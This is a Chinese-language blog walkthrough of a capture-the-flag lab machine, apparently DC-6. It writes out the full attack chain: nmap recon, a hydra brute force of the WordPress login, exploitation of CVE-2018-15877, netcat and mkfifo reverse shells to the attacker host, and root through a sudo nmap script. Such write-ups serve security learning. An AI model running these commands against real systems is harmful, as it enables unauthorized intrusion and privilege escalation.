还是老规矩。使用arp-scan -l查找我们的目标主机

192.168.75.139

使用nmap进一步获取相关信息 nmap -sS -A -p 1-65535 192.168.75.139

开启了80-22两个端口。直接访问80进一步测试

和DC2的靶场有点类似,本地还需要重定向一下、

nano /etc/hosts 或编辑C:\Windows\System32\drivers\etc\hosts

访问成功

使用nmap漏洞扫描脚本nmap –script=vuln 192.168.75.139

跑出来一些奇怪的东西,复制出来,做用户表,然后用hydra爆破?

/usr/share/wordlists/rockyou.txt复制出来为passwd.txt

hydra -L user.txt -P passwd.txt wordy http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&rememberne=forever&wp-submit=Log In:S=1'

可得账号,密码为:mark/helpdesk01

发现有Activity monitor,这个模块的tools中的lookup存在CVE-2018-15877远程命令执行漏洞

burpsuit直接反弹shell

nc -lvvp 4444

nc -e /bin/bash 192.168.75.129 4444

根据以往的操作,进入到home目录下。应该有一些奇奇怪怪的东西在里面

cd /home/mark
ls
cat things-to-do.txt

给出了graham的密码,更换账号ssh登陆

ssh graham@192.168.75.139

尝试提权

sudo -l

发现jens账户是无密得,不过ssh是登陆不上去的,但是可以看到jens账户对backups.sh是有权限执行的,也是有写入的权限,所以,尝试在执行此文件时,顺道反弹shell

echo ‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f| bin/sh -i 2>&1 | nc 192.168.75.129 5555’ > backups.sh

sudo -u jens /home/jens/backups.sh

攻击机监听端口5555,获得jens的shell

同样,发现root账户是无密得,但是nmap是有root权限的

写一个nmap的脚本,运行从而获得root权限

echo 'os.execute("/bin/sh")' >root.nse
ls
sudo nmap --script=/home/jens/root.nse
whoami
cd ~
cat theflag.txt

天渊应龙圣神大帝-道锋潜鳞

天渊应龙圣神大帝-道锋潜鳞

以凡人之躯,承载天之道义

1 条评论

头像

隐忍 · 2020年4月19日 下午1:10

大佬牛逼

发表评论

电子邮件地址不会被公开。 必填项已用*标注